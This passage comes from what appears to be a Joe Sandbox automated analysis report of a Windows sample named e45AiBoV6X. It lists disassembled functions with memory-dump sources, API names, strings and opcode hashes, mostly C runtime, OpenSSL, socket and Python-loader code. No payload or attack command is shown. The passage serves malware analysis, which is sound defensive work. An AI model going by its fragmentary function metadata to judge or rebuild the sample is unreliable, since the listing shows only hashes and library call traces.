                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                              • String ID:
                                                              • API String ID: 4070488512-0
                                                              • Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                              • Instruction ID: f639b0aa5e08c4bbfd391599fb3a6491ca6d7af74d319029684dea07566e0757
                                                              • Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                              • Instruction Fuzzy Hash: C4D1A026E1824386E720EF25DAA01B963A1EF4C7D4F44A535EA2DC7AE5FE3CE441C740
                                                              Function 00007FF6FB1F9924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                              • Instruction ID: e30b4200656ae975394dda14665093425b56bd2c92e8d4d1f2032a7fcbb2e710
                                                              • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                              • Instruction Fuzzy Hash: 66317636A08B8285D760DF25E8542BE73A4FB8C798F541135EAAD87BA9EF3CD145C700
                                                              Function 00007FF6FB200B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 2227656907-0
                                                              • Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                              • Instruction ID: d122b4eb2813cd70ffce6843a5c107e519c131e620da343c94caa06004dd2823
                                                              • Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                              • Instruction Fuzzy Hash: D3B19621B1869B41FB60DB21D6245BA6291EB58BE4F446132EA6DD7BEDFF3CE441C300
                                                              Function 00007FF6FB20518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051BA
                                                                • Part of subcall function 00007FF6FB204908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB20491C
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051CB
                                                                • Part of subcall function 00007FF6FB2048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB2048BC
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051DC
                                                                • Part of subcall function 00007FF6FB2048D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB2048EC
                                                                • Part of subcall function 00007FF6FB1F9C58: HeapFree.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                                • Part of subcall function 00007FF6FB1F9C58: GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FB20541C), ref: 00007FF6FB205203
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                              • String ID:
                                                              • API String ID: 3458911817-0
                                                              • Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                              • Instruction ID: 84219a2c855dfa693130133d1c4c34ccd528d016bfff61c364647bc3c10870ae
                                                              • Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                              • Instruction Fuzzy Hash: 7D514E32A1864386E720EF21EAA11B96760BF4C784F44A535EA6DC76F6EF3CE4408740
                                                              Function 00007FFDFB381DCF Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 451COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991624093.00007FFDFB381000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFB380000, based on PE: true
                                                              • Associated: 00000001.00000002.1991585735.00007FFDFB380000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F3000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB418000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB423000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB42D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992057570.00007FFDFB430000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb380000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\_w\1\s\ssl\packet_local.h
                                                              • API String ID: 3568877910-927607112
                                                              • Opcode ID: 0911ee5ebdf54031d9eb09136f9d968bcf9013cc6d8919ac220e9f4e880da2f4
                                                              • Instruction ID: 6f2fb5d04c7272fc3766f62013e48b7baff1761d43653419416a1578ee16928c
                                                              • Opcode Fuzzy Hash: 0911ee5ebdf54031d9eb09136f9d968bcf9013cc6d8919ac220e9f4e880da2f4
                                                              • Instruction Fuzzy Hash: A712C5B2B49A8286E760ABA1E424ABD67E0FB84788F144035DEAD476EDDF7CD550C700
                                                              Function 00007FFDFAEE12F0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 343COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989811289.00007FFDFAEE1000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989771802.00007FFDFAEE0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAF44000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAF93000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFF1000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFF4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990150988.00007FFDFAFF5000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990196980.00007FFDFAFF7000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfaee0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: 0
                                                              • API String ID: 3568877910-4108050209
                                                              • Opcode ID: 694d1ef10048d8d9e723c88d7a4fb3d794fcf611330daaf8e0fc82ac1a635172
                                                              • Instruction ID: 881cd3c43ea1665c6b9ed8b8985434ea1d90ffd0b576fcd2576b85f40df50581
                                                              • Opcode Fuzzy Hash: 694d1ef10048d8d9e723c88d7a4fb3d794fcf611330daaf8e0fc82ac1a635172
                                                              • Instruction Fuzzy Hash: 71E1C172B0C59385E768AB1594A4A7932A5FF64740F560175EE6F827CCDF2EEC81C700
                                                              Function 00007FFDFB002B5D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastbind
                                                              • String ID: ..\s\crypto\bio\b_sock2.c
                                                              • API String ID: 2328862993-3200932406
                                                              • Opcode ID: 8475ffe534be1b52f8a83a963f2585e8110bc00f71c71f802b4263a764d0a002
                                                              • Instruction ID: 3c33e4c5fbb3aa6a5fa2c285a4c5f105a8fb336f0a2a718c411adfb6b9421a7c
                                                              • Opcode Fuzzy Hash: 8475ffe534be1b52f8a83a963f2585e8110bc00f71c71f802b4263a764d0a002
                                                              • Instruction Fuzzy Hash: 07219F71B0A65386E7109B25E814AAE6360FB86B88F440531EAAD43BEDDF3CE5459F00
                                                              Function 00007FFDFB004241 Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ef918091fb096f7f3b15b52f56d1f20409e7fcd6a29bffb6e9c2c8edbbbe5802
                                                              • Instruction ID: 66132470af7868bbc43654c59f33f633d7efc9a4478a757950f821ce3d2ac09e
                                                              • Opcode Fuzzy Hash: ef918091fb096f7f3b15b52f56d1f20409e7fcd6a29bffb6e9c2c8edbbbe5802
                                                              • Instruction Fuzzy Hash: A9F0B4313282A105C755CE36A408F596DD19791BC8F52C030990CC3F98E92EC5018B40
                                                              Function 00007FFDFB00572C Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55c2a1e253ae0d4be43f02913abd1952e0faa7daf1409bf0e3cf9f60e9e50613
                                                              • Instruction ID: 65337d5b99eb144310de3bba49d42b4ef30014d2e3142f16c33bd2be42115d6c
                                                              • Opcode Fuzzy Hash: 55c2a1e253ae0d4be43f02913abd1952e0faa7daf1409bf0e3cf9f60e9e50613
                                                              • Instruction Fuzzy Hash: 95E0DF727193A505C796CE33A118E69AA91A316B89F83C030A90DC3B99ED2EC601DB40
                                                              Function 00007FFDFB0032F6 Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c56cf6a6487dceeb00cd67b5ea337eb2185dad23aeb4fdd049dd72e8a09a134
                                                              • Instruction ID: 37abe064c7f6f5615cf2cebfad5c32c21055ccf531f4b337ddaf029ccdf80933
                                                              • Opcode Fuzzy Hash: 7c56cf6a6487dceeb00cd67b5ea337eb2185dad23aeb4fdd049dd72e8a09a134
                                                              • Instruction Fuzzy Hash: E5A002F4B15556296F6503615251B7806431A493CA8E29470A479112984A1CA150A150
                                                              Function 00007FF6FB1E50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E50C0
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5101
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5126
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E514B
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5173
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E519B
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E51C3
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E51EB
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5213
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                              • API String ID: 190572456-2007157414
                                                              • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                              • Instruction ID: 64fc361415386140762d15d431bcb8a047f2fe96515796d1914d3aec1433a503
                                                              • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                              • Instruction Fuzzy Hash: 521264A4D1DB0395FB65DB08AAB41B822A1AF4C794F946435D83ED2AF0FF7CB5488340
                                                              Function 00007FF6FB1E6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
